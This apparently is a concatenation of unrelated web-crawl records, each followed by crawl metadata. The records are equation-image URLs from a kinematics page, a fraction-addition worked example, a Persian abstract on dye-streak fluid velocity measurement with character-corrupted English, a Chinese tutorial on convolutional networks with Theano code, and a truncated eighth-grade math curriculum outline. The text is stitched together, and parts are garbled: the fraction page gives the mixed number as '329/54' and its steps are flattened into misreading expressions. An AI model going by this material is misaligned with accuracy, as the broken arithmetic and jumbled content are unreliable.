"https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2%2B3t", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(1%5Cright)%3D%5Cleft(1%5Cright)%5E2%2B3%5Ctimes%5Cleft(1%5Cright)", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(1%5Cright)%3D4%5C%20m", null, "https://equatio-api.texthelp.com/svg/a%5Cleft(t%5Cright)%3D6t-1%5C%20ms%5E%7B-2%7D", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7Da%5Cleft(t%5Cright)dt", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7D6t-1%5C%20dt", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-t%2BC", null, "https://equatio-api.texthelp.com/svg/1%3D3%5Cleft(0%5Cright)%5E2-%5Cleft(0%5Cright)%2BC", null, "https://equatio-api.texthelp.com/svg/1%3DC", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D3t%5E2-t%2B1", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7Dv%5Cleft(t%5Cright)%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3D%5Cint_%7B%20%7D%5E%7B%20%7D3t%5E2-t%2B1%5C%20dt", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-%5Cfrac%7B1%7D%7B2%7Dt%5E2%2Bt%2BK", null, "https://equatio-api.texthelp.com/svg/2%3D%5Cleft(0%5Cright)%5E3-%5Cfrac%7B1%7D%7B2%7D%5Cleft(0%5Cright)%5E2%2B%5Cleft(0%5Cright)%2BK", null, "https://equatio-api.texthelp.com/svg/2%3DK", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E3-%5Cfrac%7B1%7D%7B2%7Dt%5E2%2Bt%2B2", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B%5Cleft(4%5Ctimes5%5Cright)%7D%7B2%7D%3D10", null, "https://equatio-api.texthelp.com/svg/6%5Ctimes5%3D30", null, "https://equatio-api.texthelp.com/svg/6%5Ctimes3%3D18", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B6%7D%7B3%7D%3D2", null, "https://equatio-api.texthelp.com/svg/%5Cfrac%7B-6%7D%7B4%7D%3D-1.5", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2-6t%2B4%5C%20m", null, "https://equatio-api.texthelp.com/svg/v%5Cleft(t%5Cright)%3D2t-6%5C%20ms%5E%7B-1%7D", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(t%5Cright)%3Dt%5E2-6t%2B4", null, "https://equatio-api.texthelp.com/svg/s%5Cleft(3%5Cright)%3D%5Cleft(3%5Cright)%5E2-6%5Ctimes%5Cleft(3%5Cright)%2B4", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91810745,"math_prob":0.99536073,"size":10417,"snap":"2023-40-2023-50","text_gpt3_token_len":2219,"char_repetition_ratio":0.22683184,"word_repetition_ratio":0.136,"special_character_ratio":0.2124412,"punctuation_ratio":0.11088811,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998203,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90],"im_url_duplicate_count":[null,2,null,2,null,4,null,2,null,4,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,4,null,4,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-06T08:46:49Z\",\"WARC-Record-ID\":\"<urn:uuid:649b6fc6-f4af-4981-8a81-c6c0b32c1310>\",\"Content-Length\":\"259837\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5544062f-673d-4a69-acc8-ad8c3a4f0b63>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb9ca68e-2d8f-4416-893b-87b76d2baa5f>\",\"WARC-IP-Address\":\"172.67.200.96\",\"WARC-Target-URI\":\"https://mathsathome.com/displacement-velocity-acceleration/\",\"WARC-Payload-Digest\":\"sha1:5JFCYUKVLIGOB5TTBRY6JG3JCVUAF7HW\",\"WARC-Block-Digest\":\"sha1:P5UYMLTV7YDJQZLTH63CWUYULLC2HH5R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100583.31_warc_CC-MAIN-20231206063543-20231206093543-00702.warc.gz\"}"}
https://answers.everydaycalculation.com/add-fractions/14-4-plus-1-27
[ "Solutions by everydaycalculation.com\n\nAdd 14/4 and 1/27\n\n1st number: 3 2/4, 2nd number: 1/27\n\n14/4 + 1/27 is 191/54.\n\nSteps for adding fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 27 is 108\n2. For the 1st fraction, since 4 × 27 = 108,\n14/4 = 14 × 27/4 × 27 = 378/108\n3. Likewise, for the 2nd fraction, since 27 × 4 = 108,\n1/27 = 1 × 4/27 × 4 = 4/108\n4. Add the two fractions:\n378/108 + 4/108 = 378 + 4/108 = 382/108\n5. After reducing the fraction, the answer is 191/54\n6. In mixed form: 329/54" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61641437,"math_prob":0.99878305,"size":369,"snap":"2019-43-2019-47","text_gpt3_token_len":177,"char_repetition_ratio":0.23835616,"word_repetition_ratio":0.0,"special_character_ratio":0.56368566,"punctuation_ratio":0.089108914,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99933267,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-15T05:57:53Z\",\"WARC-Record-ID\":\"<urn:uuid:536916bc-57d5-4caa-8163-e698b75fc2d3>\",\"Content-Length\":\"8618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6d76a71-a9f4-400d-adcb-56c05563cee3>\",\"WARC-Concurrent-To\":\"<urn:uuid:b98ae66a-77eb-42a6-a533-107222c4490d>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/14-4-plus-1-27\",\"WARC-Payload-Digest\":\"sha1:3TXIMX32NOWWCFRUOSN2VCOHRAO2H3CT\",\"WARC-Block-Digest\":\"sha1:YLBSOUY5R3CL5L5XCQNA2FQGWXR6CVTR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986657586.16_warc_CC-MAIN-20191015055525-20191015083025-00072.warc.gz\"}"}
http://sjce.journals.sharif.edu/article_26.html
[ "# برآورد سرعت سیال با استفاده از نوار خطوط رنگی\n\nنوع مقاله : یادداشت فنی\n\nنویسندگان\n\n1 دانشکده مهندسی عمران، دانشگاه صنعتی شریف\n\n2 دانشکده‌ی مهندسی عمران، دانشگاه صنعتی شریف\n\nچکیده\n\nاستفاده از مواد رنگی ــ نظیر فلوئورسین که می‌توانند در آب خطوط رنگی تولید کنند، یکی از روش‌های به‌دست آوردن سرعت سیال است. در این تحقیق ضمن بررسی آزمایشگاهی تأثیر یک ناهمواری بلند بر تغییرات سرعت در یک سیال دولایه، سرعت سیال در بالادست ناهمواری با استفاده از روش خطوط رنگی به دست می‌آید. سپس سرعت به‌دست آمده از این روش با یک مدل عددیِ تعمیم یافته مقایسه می‌شود. این مدل عددی از حل عددی معادلات حاکم بر حرکت سیال برای بستری ناهموار و در دستگاه مختصات منحنی‌الخط حاصل شده است. توزیع سرعت و دبی لایه ها با استفاده از روش خطوط رنگی محاسبه شده و با نتایج عددی مقایسه می شوند. نتایج این مقایسه حاکی از قابلیت‌های این روش برای برآورد سرعت سیال است.\n\nکلیدواژه‌ها\n\nعنوان مقاله [English]\n\n### F‌L‌U‌I‌D V‌E‌L‌O‌C‌I‌T‌Y M‌E‌A‌S‌U‌R‌E‌M‌E‌N‌T‌S U‌S‌I‌N‌G D‌Y‌E S‌T‌R‌E‌A‌K M‌E‌T‌H‌O‌D\n\nنویسندگان [English]\n\n• M. A‌k‌h‌a‌v‌an 1\n• M.M. Jamali 2\n1 D‌e‌p‌t. o‌f C‌i‌v‌i‌l E‌n‌g‌i‌n‌e‌e‌r‌i‌n‌g S‌h‌a‌r‌i‌f U‌n‌i‌v‌e‌r‌s‌i‌t‌y o‌f T‌e‌c‌h‌n‌o‌l‌o‌g‌y\n2 D‌e‌p‌t. o‌f C‌i‌v‌i‌l E‌n‌g‌i‌n‌e‌e‌r‌i‌n‌g S‌h‌a‌r‌i‌f U‌n‌i‌v‌e‌r‌s‌i‌t‌y o‌f T‌e‌c‌h‌n‌o‌l‌o‌g‌y\nچکیده [English]\n\nU‌s‌i‌n‌g c‌o‌l‌o‌r‌e‌d s‌u‌b‌s‌t‌a‌n‌c‌e‌s l‌i‌k‌e F‌l‌u‌o‌r‌e‌s‌c‌e‌n‌t a‌n‌d N‌i‌g‌r‌o‌s‌i‌n‌e c‌r‌y‌s‌t‌a‌l‌s w‌h‌i‌c‌h p‌r‌o‌d‌u‌c‌e d‌y‌e s‌t‌r‌e‌a‌k‌s i‌n w‌a‌t‌e‌r i‌s o‌n‌e w‌a‌y o‌f o‌b‌t‌a‌i‌n‌i‌n‌g v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s o‌f a f‌l‌u‌i‌d. I‌n t‌h‌i‌s s‌t‌u‌d‌y t‌h‌e e‌f‌f‌e‌c‌t‌s o‌f a l‌a‌r‌g‌e s‌i‌l‌l o‌n t‌h‌e s‌e‌l‌e‌c‌t‌i‌v‌e w‌i‌t‌h‌d‌r‌a‌w‌a‌l o‌f a t‌w‌o-l‌a‌y‌e‌r f‌l‌u‌i‌d t‌h‌r‌o‌u‌g‌h a l‌i‌n‌e s‌i‌n‌k i‌s e‌x‌a‌m‌i‌n‌e‌d e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌a‌l‌l‌y. T‌h‌e f‌l‌o‌w f‌i‌e‌l‌d u‌p‌s‌t‌r‌e‌a‌m o‌f t‌h‌e s‌i‌l‌l w‌a‌s m‌e‌a‌s‌u‌r‌e‌d u‌s‌i‌n‌g d‌y‌e s‌t‌r‌e‌a‌k‌s m‌e‌t‌h‌o‌d a‌n‌d t‌h‌e r‌e‌s‌u‌l‌t‌s w‌e‌r‌e c‌o‌m‌p‌a‌r‌e‌d w‌i‌t‌h t‌h‌e p‌r‌e‌d‌i‌c‌t‌i‌o‌n‌s o‌f a n‌u‌m‌e‌r‌i‌c‌a‌l m‌o‌d‌e‌l. T‌h‌e c‌o‌m‌p‌a‌r‌i‌s‌o‌n o‌f t‌h‌e d‌i‌s‌c‌h‌a‌r‌g‌e‌s a‌n‌d v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s i‌n‌d‌i‌c‌a‌t‌e‌s a g‌o‌o‌d a‌g‌r‌e‌e‌m‌e‌n‌t b‌e‌t‌w‌e‌e‌n t‌h‌e\nm‌e‌a‌s‌u‌r‌e‌d v‌e‌l‌o‌c‌i‌t‌y p‌r‌o‌f‌i‌l‌e‌s a‌n‌d t‌h‌e p‌r‌e‌d‌i‌c‌t‌i‌o‌n‌s.\n\nکلیدواژه‌ها [English]\n\n• d‌y‌e s‌t‌r‌e‌a‌k‌s\n• t‌w‌o-l‌a‌y‌e‌r f‌l‌u‌i‌d\n• l‌a‌r‌g‌e s‌i‌l‌l" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6557135,"math_prob":0.9567672,"size":782,"snap":"2022-05-2022-21","text_gpt3_token_len":256,"char_repetition_ratio":0.102827765,"word_repetition_ratio":0.016949153,"special_character_ratio":0.19181585,"punctuation_ratio":0.03937008,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9551426,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-29T11:14:06Z\",\"WARC-Record-ID\":\"<urn:uuid:ab76ec53-ca54-40aa-bd03-2be4f2704e1e>\",\"Content-Length\":\"50215\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:165bb395-2fa3-4df7-9f91-8c9dcc1e37cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:65365193-40c8-4020-b271-58bdbd1e2406>\",\"WARC-IP-Address\":\"81.31.168.62\",\"WARC-Target-URI\":\"http://sjce.journals.sharif.edu/article_26.html\",\"WARC-Payload-Digest\":\"sha1:TRR5LAZ6TUJI2VW4Z5BM6QHXG7VV3X5F\",\"WARC-Block-Digest\":\"sha1:JXXAX7KWWG5RKH7NBQROPZS54OVCHHIG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662644142.66_warc_CC-MAIN-20220529103854-20220529133854-00214.warc.gz\"}"}
https://www.jiqizhixin.com/articles/2017-01-31
[ "# 《神经网络和深度学习》系列文章四十五:卷积神经网络在实际中的应用\n\n### 目录\n\n1、使用神经网络识别手写数字\n\n2、反向传播算法是如何工作的\n\n3、改进神经网络的学习方法\n\n4、神经网络可以计算任何函数的可视化证明\n\n5、为什么深度神经网络的训练是困难的\n\n6、深度学习\n\n• 介绍卷积网络\n• 卷积神经网络在实际中的应用\n• 卷积网络的代码\n• 图像识别领域中的近期进展\n• 其他的深度学习模型\n• 神经网络的未来\n\n``````>>> import network3\n>>> from network3 import Network\n>>> from network3 import ConvPoolLayer, FullyConnectedLayer, SoftmaxLayer\n>>> training_data, validation_data, test_data = network3.load_data_shared()\n>>> mini_batch_size = 10\n>>> net = Network([\nFullyConnectedLayer(n_in=784, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````", null, "``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2)),\nFullyConnectedLayer(n_in=20*12*12, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````\n\n• 如果你删除了全连接层,只使用卷积-混合层和柔性最大值层,你得到了什么样的分类准确率?全连接层的加入有帮助吗?\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2)),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2)),\nFullyConnectedLayer(n_in=40*4*4, n_out=100),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.1,\nvalidation_data, test_data)``````\n\n• 使用 tanh 激活函数    在本书前面我已经几次提起过 tanh 函数可以是一个比 S型函数更好的激活函数。我们还没有实际采用过这些建议,因为我们已经用 S 型取得了大量进展。但现在让我们试试一些用 tanh 作为我们激活函数的实验。试着训练卷积和全连接层中具有 tanh 激活值的网络。开始时使用 S 型网络中使用的相同的超参数,但是训练", null, "个迭代期,而不是", null, "个。你的网络表现得怎么样?如果你继续训练到", null, "个迭代期会怎样?试着将tanh和 S型网络的每个迭代期的验证准确率都绘制出来,都绘制到", null, "个迭代期。如果你的结果和我的相似,你会发现 tanh 网络训练得稍微快些,但是最终的准确率非常相似。你能否解释为什么 tanh 网络可以训练得更快?你能否用 S型取得一个相似的训练速度,也许通过改变学习速率,或者做些调整?试着用五六个迭代学习超参数和网络架构,寻找 tanh 优于 S 型的方面。注意:这是一个开放式问题。就我个人而言,我并没有找到太多切换为 tanh 的优势,虽然我没全面地做过实验,也许你会找到一个方法。无论如何,我们马上会发现切换到修正线性激活函数的一个优势,所以我们不会去深入使用 tanh 函数。\n\n``````>>> from network3 import ReLU\n>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n``\\$ python expand_mnist.py``\n\n``````>>> expanded_training_data, _, _ = network3.load_data_shared(\n\"../data/mnist_expanded.pkl.gz\")\n>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(expanded_training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n• 卷积层的想法是以一种横跨图像不变的方式作出反应。它看上去令人惊奇,然而,当我们做完所有输入数据的转换,网络能学习得更多。你能否解释为什么这实际上很合理?\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(n_in=40*4*4, n_out=100, activation_fn=ReLU),\nFullyConnectedLayer(n_in=100, n_out=100, activation_fn=ReLU),\nSoftmaxLayer(n_in=100, n_out=10)], mini_batch_size)\n>>> net.SGD(expanded_training_data, 60, mini_batch_size, 0.03,\nvalidation_data, test_data, lmbda=0.1)``````\n\n``````>>> net = Network([\nConvPoolLayer(image_shape=(mini_batch_size, 1, 28, 28),\nfilter_shape=(20, 1, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nConvPoolLayer(image_shape=(mini_batch_size, 20, 12, 12),\nfilter_shape=(40, 20, 5, 5),\npoolsize=(2, 2),\nactivation_fn=ReLU),\nFullyConnectedLayer(\nn_in=40*4*4, n_out=1000, activation_fn=ReLU, p_dropout=0.5),\nFullyConnectedLayer(\nn_in=1000, n_out=1000, activation_fn=ReLU, p_dropout=0.5),\nSoftmaxLayer(n_in=1000, n_out=10, p_dropout=0.5)],\nmini_batch_size)\n>>> net.SGD(expanded_training_data, 40, mini_batch_size, 0.03,\nvalidation_data, test_data)``````", null, "1.注意 network3.py 包含了源自 Theano 库文档中关于卷积神经网络(尤其是 LeNet-5 (http://deeplearning.net/tutorial/lenet.html) 的实现),Misha Denil 的 弃权的实现 (https://github.com/mdenil/dropout),以及 Chris Olah (http://colah.github.io/) 的概念。\n\n2.参见 Theano: A CPU and GPU Math Expression Compiler in Python (http://www.iro.umontreal.ca/~lisa/pointeurs/theano_scipy2010.pdf),作者为 James Bergstra, Olivier Breuleux, Frederic Bastien, Pascal Lamblin, fRavzan Pascanu, Guillaume Desjardins, Joseph Turian, David Warde-Farley, 和 Yoshua Bengio (2010)。 Theano 也是流行的 Pylearn2 (http://deeplearning.net/software/pylearn2/) 和 Keras (http://keras.io/) 神经网络库的基础。其它在本文写作时流行的神经网路库包括 Caffe (http://caffe.berkeleyvision.org/) 和 Torch (http://torch.ch/) 。\n\n3.当我发布这一章时,Theano 的当前版本变成了 0.7。我实际上已经在 Theano 0.7 版本中重新运行过这些例子并取得了和文中非常相似的结果。\n\n4.本节中的实验代码可以在 https://github.com/mnielsen/neural-networks-and-deep-learning/blob/master/src/conv.py 这个脚本中找到。注意,脚本中的代码只是简单地重复并相对于本节中的讨论。\n\n5.实际上,在这个实验中我其实对这个架构的网络运行了三次独立的训练。然后我从这三次运行中报告了对应于最佳验证准确率的测试准确率。利用多次运行有助于减少结果中的变动,\n\n6.这里我继续使用一个大小为 10 的小批量数据。正如我们前面讨论过的,使用更大的小批量数据可能提高训练速度。我继续使用相同的小批量数据,主要是为了和前面章节中的实验保持一致。\n\n7.如果输入图像是有颜色的,这个问题会在第一层中出现。在这种情况下,对于每一个像素我们会有 3个输入特征,对应于输入图像中的红色、绿色和蓝色通道。因此我们将允许特征检测器可访问所有颜色信息,但仅仅在一个给定的局部感受野中。\n\n8.注意你可以将 activation_fn=tanh 作为一个参数传递给 ConvPoolLayer 和 FullyConnectedLayer 类。\n\n9.你也许可以回想  来找灵感。\n\n10.“Gradient-based learning applied to document recognition”(http://yann.lecun.com/exdb/publis/pdf/lecun-98.pdf),作者为 Yann LeCun, Léon Bottou, Yoshua Bengio, 和 Patrick Haffner (1998)。细节上有很多不同,但大体上讲,我们的网络和论文中描述的网络非常相似。\n\n11.一个通常的理由是 max(0,z) 在 z 取最大极限时不会饱和,不像 S 型神经元,而这有助于修正线性单元持续学习。到目前为止,这一辩解很好,但不是一个详细的理由,更多的是一个“就这样”的故事。注意我们在第二章里讨论过饱和的问题。\n\n12. expand_mnist.py 的代码可以从 https://github.com/mnielsen/neural-networks-and-deep-learning/blob/master/src/expand_mnist.py 这里获取。\n\n13. Best Practices for Convolutional Neural Networks Applied to Visual Document Analysis (http://dx.doi.org/10.1109/ICDAR.2003.1227801),作者为 Patrice Simard, Dave Steinkraus, 和 John Platt (2003)。\n\n14. Deep, Big, Simple Neural Nets Excel on Handwritten Digit Recognition\n\n(http://arxiv.org/abs/1003.0358),作者为 Dan Claudiu Cireșan, Ueli Meier,Luca Maria Gambardella, 和 Jürgen Schmidhuber (2010)。", null, "", null, "", null, "" ]
[ null, "https://pic.36krcnd.com/201708/08095228/7iyvostw9sm1yom3", null, "https://pic.36krcnd.com/201708/08095228/w1pzhyemjx2uwaln", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095227/gg42hvf72cd1ymsh", null, "https://pic.36krcnd.com/201708/08095244/rolfu04ajcfbu0kd", null, "https://image.jiqizhixin.com/uploads/wangeditor/e7406ee5-c588-46e3-846d-24f0d7414b16/5976200000.png", null, "https://image.jiqizhixin.com/uploads/special_column/avatar/5b5e805b-7952-4dc8-a701-3b7699934c7a/avatar-1659ffc1-a6ae-425c-aaa4-764de8d246d3.png", null, "https://cdn.jiqizhixin.com/assets/comment_none-5e1197d791fbe4840c7b95207c03e1e846ffcc6cf5060aab501cc39ac508b3ae.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9668645,"math_prob":0.96169823,"size":14211,"snap":"2019-43-2019-47","text_gpt3_token_len":10764,"char_repetition_ratio":0.114732176,"word_repetition_ratio":0.20403321,"special_character_ratio":0.22742945,"punctuation_ratio":0.16223133,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9767768,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,5,null,5,null,null,null,null,null,null,null,5,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T04:17:47Z\",\"WARC-Record-ID\":\"<urn:uuid:b4350f5c-20fb-458a-942b-79363f6cd81e>\",\"Content-Length\":\"58194\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7f55fcaa-5150-4d13-905d-55145524761a>\",\"WARC-Concurrent-To\":\"<urn:uuid:b8d76e28-ee49-4445-b859-47e6ec711693>\",\"WARC-IP-Address\":\"39.106.131.93\",\"WARC-Target-URI\":\"https://www.jiqizhixin.com/articles/2017-01-31\",\"WARC-Payload-Digest\":\"sha1:AS2HF3HJDZYIQVKAGFVJL2Q7RNWADFA4\",\"WARC-Block-Digest\":\"sha1:WUS4KMIWHT6MRFCVENZ47XK7PR3ODLJS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670729.90_warc_CC-MAIN-20191121023525-20191121051525-00471.warc.gz\"}"}
https://www.time4learning.com/homeschool-curriculum/middle-school/eighth-grade/math-lesson-plans.html
[ "# Eighth Grade Math Curriculum and Lesson Plans\n\nEighth-grade math is typically a course in pre-algebra to help prepare students for high school algebra. Our 8th-grade math curriculum can be used either as a main homeschool program or as a supplement to another homeschool curriculum or a traditional school. The following information will explain what steps you should take to meet your child’s 8th-grade math goals and objectives and how our 8th-grade math curriculum can help.\n\nAn 8th-grade math program should cover various areas of mathematics, not just arithmetic. The primary strands for an 8th-grade math curriculum are number sense and operations, algebra, geometry, and spatial sense, measurement, and data analysis and probability. While these math strands might surprise you, they are all critical lessons for an 8th-grade math curriculum.\n\nThese skills will improve math fluency and help build upon the math facts, concepts, and strategies acquired in the past, making future success more achievable. Here are some topics that eighth graders should already know in math:\n\n• Writing numbers in word, standard, expanded, and scientific notation\n• Identifying and using ratios and rates\n• Multiplying and dividing with positive and negative rational numbers\n• Finding the perimeter and area of two-dimensional figures\n• Identifying and plotting ordered pairs in four quadrants and along the axes\n• Calculating probabilities of independent and dependent events\n\nThe following is a general list of some math learning objectives eighth graders should attain:\n\nIdentify rational and irrational numbers and describe meanings.\nCalculate and approximate principal square roots.\nIdentify and perform transformations of a figure on a coordinate plane.\nSolve problems in two variables using linear equations.\nDefine and differentiate between different types of sampling techniques.\nUse technology to determine the mean, median, mode, and range of a set of real-world data.\n\n## Eighth-Grade Math Scope & Sequence\n\n#### Lesson 1: Scientific Notation\n\nExpress numbers between zero and one in scientific notation.\n\n#### Lesson 2: Rational and Irrational Numbers\n\nIdentify rational and irrational numbers and describe meanings.\n\n#### Lesson 3: Absolute Value\n\nIdentify and explain absolute value.\n\n#### Lesson 1: Comparing Large Numbers in Scientific Notation\n\nCompare large numbers in scientific notation.\n\n#### Lesson 2: Comparing Small Numbers in Scientific Notation\n\nCompare small numbers in scientific notation.\n\n#### Lesson 3: Adding and Subtracting Numbers in Scientific Notation\n\nAdd and subtract numbers in scientific notation.\n\n#### Lesson 4: Using Scientific Notation with Technology\n\nUse scientific notation with technology\n\n#### Lesson 1: Repeating Decimals to Fractions\n\nConvert repeating decimals to fractions.\n\n#### Lesson 2: Roots\n\nCalculate and approximate principal square roots.\n\n#### Lesson 3: Using Roots to Solve Equations\n\nUse roots to solve equations.\n\n#### Lesson 4: Compare and Order\n\nCompare and order numbers in many forms including: fractions, decimals, scientific notation, absolute value, and radicals.\n\n#### Lesson 5: Estimation\n\nUse estimation for situations using real numbers.\n\n#### Lesson 6: Properties\n\nApply properties to solve problems with real numbers.\n\n#### Lesson 7: Real Number Operations\n\nSimplify numerical expressions with real numbers.\n\n#### Lesson 1: Divisibility Rules\n\nUse divisibility rules to solve problems.\n\n#### Lesson 2: Multiple Representations\n\nRepresent numbers in base ten in other bases (two, five, and eight) and vice versa.\n\n#### Lesson 3: Prime and Composite\n\nIdentify numbers as relatively prime.\n\n#### Lesson 1: Rate of Change\n\nDescribe and use rate of change to solve problems.\n\n#### Lesson 2: Proportions\n\nUse proportional relationships to find measures of length, weight or mass, and capacity or volume.\n\n#### Lesson 3: Percents\n\nSolve real world problems involving percents greater than 100.\n\n#### Lesson 4: Comparing Two Proportional Relationships\n\nCompare two proportional relationships.\n\n#### Lesson 1: Operations\n\nSolve real world problems with rational numbers (including integers, decimals and fractions).\n\n#### Lesson 2: Real World Problems\n\nSolve real world problems with ratios, rates, proportions, and percents.\n\n#### Lesson 3: Multi-Step Problems\n\nSolve real world two- or three- step problems with integers, decimals, fractions, ratios, rates, proportions, and percents.\n\n#### Lesson 1: Expressions\n\nSubstitute rational numbers into expressions and evaluate.\n\n#### Lesson 2: Expressions with Exponents\n\nSubstitute rational numbers into expressions with exponents and radicals.\n\n#### Lesson 3: Expressions and Equations\n\nTranslate word expressions and equations into algebraic expressions and equations (including one or more variables and exponents).\n\n#### Lesson 4: Expressions, Equations, and Inequalities\n\nTranslate verbal expressions and sentences into algebraic inequalities and vice versa.\n\n#### Lesson 5: Real World Expressions\n\nUse variables to represent unknown quantities in real world situations.\n\n#### Lesson 6: Simplify\n\nCombine and simplify algebraic expressions with a maximum of two variables.\n\n#### Lesson 7: 